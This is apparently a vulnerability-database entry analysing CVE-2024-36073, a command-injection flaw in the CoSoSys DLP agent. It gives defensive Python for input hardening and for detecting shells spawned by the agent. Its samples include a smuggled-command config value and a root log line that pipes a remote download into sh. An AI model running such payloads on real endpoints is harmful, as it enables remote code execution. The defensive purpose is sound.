CVE-2024-36073: n/a
Netwrix CoSoSys Endpoint Protector through 5.9.3 and CoSoSys Unify through 7.0.6 contain a remote code execution vulnerability in the shadowing component of the Endpoint Protector and Unify agent which allows an attacker with administrative access to the Endpoint Protector or Unify server to overwrite sensitive configuration and subsequently execute system commands with SYSTEM/root privileges on a chosen client endpoint.
AI Analysis
Technical Summary
CVE-2024-36073 is a remote code execution vulnerability in the shadowing component of the Endpoint Protector and Unify agent, affecting Netwrix CoSoSys Endpoint Protector through 5.9.3 and CoSoSys Unify through 7.0.6. The agent runs with SYSTEM (Windows) or root (Linux/macOS) privileges on every managed endpoint and acts on configuration that the management server pushes to it. An attacker who already holds administrative access to the Endpoint Protector or Unify server can use that channel to overwrite sensitive agent configuration on a chosen client endpoint and, through the overwritten configuration, make the agent execute arbitrary system commands with SYSTEM or root privileges. The weakness is classified as CWE-77 (Improper Neutralization of Special Elements used in a Command): configuration values that the agent passes into a command are not neutralized, so attacker-controlled configuration becomes command injection. The CVSS v3.1 base score is 7.2 (High), matching a vector of network attack, low attack complexity, high privileges required, no user interaction, and high impact on confidentiality, integrity and availability. The privileges-required component pulls the score down, but that requirement is met by anyone holding a server administrator account, including an account obtained through credential theft or session hijacking. No public exploit was reported at the time of writing. The practical lesson is that the management server is a trust anchor for every endpoint it manages: one compromised server-side administrative account is equivalent to root on the whole managed fleet, so the server and its administrator accounts must be protected as Tier-0 infrastructure.
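The CWE-77 pattern described above, shown as an added illustration rather than code from Endpoint Protector or Unify. The `shadow_dir` setting, the tar invocation and the confinement directory are assumptions chosen to show the weakness class: a configuration value the server can write flows into a command on the endpoint. The vulnerable builder pastes the value into a shell string; the hardened builder validates it against an allowlist, confines it to the expected directory tree, and passes it as a discrete argv element with no shell.

```python
"""CWE-77 via server-pushed configuration: vulnerable and hardened builders.

Added example; NOT the product's real code. Setting names, paths and the tar
command are assumptions made for illustration only.
"""
import posixpath
import re
import subprocess
from pathlib import PurePosixPath

# Constructed configuration as an agent might receive it from the server.
# An attacker with server admin access controls every one of these values.
BENIGN_CONFIG = {"shadow_dir": "/var/lib/agent/shadow"}
MALICIOUS_CONFIG = {"shadow_dir": "/tmp; id > /tmp/pwned #"}          # metacharacter injection
TRAVERSAL_CONFIG = {"shadow_dir": "/var/lib/agent/../../../etc"}      # clean characters, wrong tree

# Assumed directory the agent is supposed to archive from.
ALLOWED_ROOT = PurePosixPath("/var/lib/agent")
SAFE_PATH = re.compile(r"^[A-Za-z0-9_./-]+$")


def build_archive_cmd_vulnerable(config: dict) -> str:
    """Vulnerable: the setting is interpolated into a shell string.
    Anything after ';' in the value becomes a second command."""
    return f"tar -czf /var/backups/shadow.tgz {config['shadow_dir']}"


def build_archive_cmd_hardened(config: dict) -> list[str]:
    """Hardened: allowlist the characters, normalise the path, confine it to
    ALLOWED_ROOT, and return argv so no shell ever parses the value."""
    value = config["shadow_dir"]
    if not SAFE_PATH.match(value):
        raise ValueError(f"shadow_dir contains disallowed characters: {value!r}")
    # posixpath.normpath collapses '..' without touching the filesystem, so the
    # check works the same on any platform and on paths that do not exist yet.
    normalised = PurePosixPath(posixpath.normpath(value))
    if not normalised.is_relative_to(ALLOWED_ROOT):
        raise ValueError(f"shadow_dir escapes {ALLOWED_ROOT}: {value!r}")
    return ["tar", "-czf", "/var/backups/shadow.tgz", str(normalised)]


def run_hardened(config: dict) -> int:
    """Execute the validated argv with shell=False; returns tar's exit code."""
    return subprocess.run(build_archive_cmd_hardened(config), check=False).returncode


if __name__ == "__main__":
    print("vulnerable:", build_archive_cmd_vulnerable(MALICIOUS_CONFIG))
    print("hardened:  ", build_archive_cmd_hardened(BENIGN_CONFIG))
    for bad in (MALICIOUS_CONFIG, TRAVERSAL_CONFIG):
        try:
            build_archive_cmd_hardened(bad)
        except ValueError as exc:
            print("rejected:  ", exc)
```

The hardened builder rejects the traversal case as well as the metacharacter case, which matters here because the advisory describes the attack as overwriting configuration, not necessarily as injecting shell syntax; a value with clean characters but the wrong meaning can be just as dangerous if the agent trusts it blindly.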
Potential Impact
An attacker holding administrative access to the management server can run arbitrary commands with the highest local privileges on any client endpoint the server manages. That is full endpoint compromise: data theft, installation of persistent malware, lateral movement from the endpoint into the rest of the network, and disruption of endpoint operations. Confidentiality, integrity and availability are all rated high: endpoint data can be read and exfiltrated, system configuration and files can be altered, and destructive payloads or tampering with the agent can take endpoints offline. The actors of concern are malicious insiders with server administration rights and external attackers who have obtained administrator credentials or an authenticated session on the server. Because the agent is installed on every protected endpoint, the scope is the entire managed fleet running vulnerable versions, which in enterprise deployments can mean thousands of machines; the vulnerability also turns the DLP and device-control platform itself into a distribution mechanism for the attacker's code.
Mitigation Recommendations
1. Upgrade Netwrix CoSoSys Endpoint Protector to the fixed release the vendor publishes (a version later than 5.9.3) and CoSoSys Unify to a version later than 7.0.6. Patching removes the injection, not the trust relationship: a server administrator will still be able to push configuration to every agent, so the remaining recommendations apply after the upgrade as well.
2. Restrict administrative access to the Endpoint Protector and Unify servers to a small set of named personnel, use dedicated administrator accounts that are not shared with day-to-day or other infrastructure roles, and enforce multi-factor authentication on them to reduce the risk of credential compromise.
3. Monitor and audit administrative actions on these servers: alert on new administrator accounts, on changes to agent or shadowing settings, and on configuration pushes targeting a single endpoint, which is the shape of the attack the advisory describes.
4. Segment the network so that only the management server can reach the agent management port on endpoints and only from a hardened address, reducing the attack surface and making unexpected server-to-endpoint traffic visible.
5. Deploy endpoint detection and response (EDR) on client devices and tune it to flag shells, scripting hosts or unknown binaries spawned by the agent process while running as SYSTEM or root, since that is the direct observable of a successful exploit.
6. Review the shadowing component's configuration and disable the feature where the deployment does not need it; consult vendor guidance before changing it, as the advisory does not describe which settings are involved.
7. Include the management infrastructure in regular security assessments and penetration tests, with explicit focus on paths that turn server-side administrative access into endpoint code execution.
8. Train administrators on the consequences of credential compromise for this product and enforce least privilege so that no account holds server administration rights without a documented need.
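A detection sketch for the EDR and audit items above, added here as an example and not vendor detection content. It scans process-creation events for shells or scripting hosts whose parent is the DLP agent and whose user is SYSTEM or root. The agent image names, the log line format and the sample events are all constructed assumptions; replace the image names with the real agent binaries from your software inventory before using the logic.

```python
"""Flag privileged shells spawned by the DLP agent process.

Added example; not the product's or any vendor's detection rule. The agent
binary names, the pipe-delimited event format and SAMPLE_LOG are constructed.
"""
from dataclasses import dataclass

# ASSUMED agent image names; substitute the real ones from your inventory.
AGENT_IMAGES = {"eppclient.exe", "epp_client", "unifyagent"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "sh", "bash", "dash", "zsh", "python", "python3", "perl"}
PRIVILEGED_USERS = {"nt authority\\system", "root"}


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Last path component, case-folded, for both Windows and POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse 'host=..|user=..|parent=..|image=..|cmd=..'. The command line is
    the last field, so a maxsplit keeps any '|' inside it intact."""
    fields = dict(part.split("=", 1) for part in line.split("|", 4))
    return ProcessEvent(fields["host"], fields["user"], fields["parent"],
                        fields["image"], fields["cmd"])


def is_suspicious(ev: ProcessEvent) -> bool:
    """Agent parent + shell child + SYSTEM/root user is the exploit's footprint."""
    return (basename(ev.parent_image) in AGENT_IMAGES
            and basename(ev.image) in SHELL_IMAGES
            and ev.user.lower() in PRIVILEGED_USERS)


def scan(lines: list[str]) -> list[ProcessEvent]:
    """Return the events that match, in log order."""
    return [ev for ev in (parse_event(l) for l in lines if l.strip()) if is_suspicious(ev)]


# Constructed sample events: two exploit-shaped, three benign.
SAMPLE_LOG = r"""
host=ws01|user=NT AUTHORITY\SYSTEM|parent=C:\Program Files\CoSoSys\EPPClient.exe|image=C:\Windows\System32\cmd.exe|cmd=cmd.exe /c whoami > C:\Windows\Temp\o.txt
host=ws01|user=NT AUTHORITY\SYSTEM|parent=C:\Program Files\CoSoSys\EPPClient.exe|image=C:\Program Files\CoSoSys\epphelper.exe|cmd=epphelper.exe --sync
host=ws02|user=CORP\alice|parent=C:\Windows\explorer.exe|image=C:\Windows\System32\cmd.exe|cmd=cmd.exe
host=lx01|user=root|parent=/opt/cososys/epp_client|image=/bin/sh|cmd=sh -c "curl http://198.51.100.7/s | sh"
host=lx02|user=root|parent=/usr/sbin/cron|image=/bin/sh|cmd=sh -c /etc/cron.daily/logrotate
""".strip()


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f"ALERT {hit.host}: {basename(hit.parent_image)} -> {hit.command_line}")
```

The rule deliberately keys on the parent-child relationship rather than on command-line contents, because the commands an attacker runs are arbitrary while the parent process is fixed by the vulnerability. Expect a tuning pass: if the legitimate agent spawns a shell for its own maintenance tasks, add those exact command lines to an exclusion list rather than widening the rule.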
Affected Countries
United States, Germany, United Kingdom, Canada, Australia, France, Netherlands, Japan, South Korea, India
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2024-05-19T00:00:00.000Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 699f6c5db7ef31ef0b5634e8
Added to database: 2/25/2026, 9:40:45 PM
Last enriched: 2/26/2026, 5:00:06 AM
Last updated: 4/12/2026, 3:43:16 PM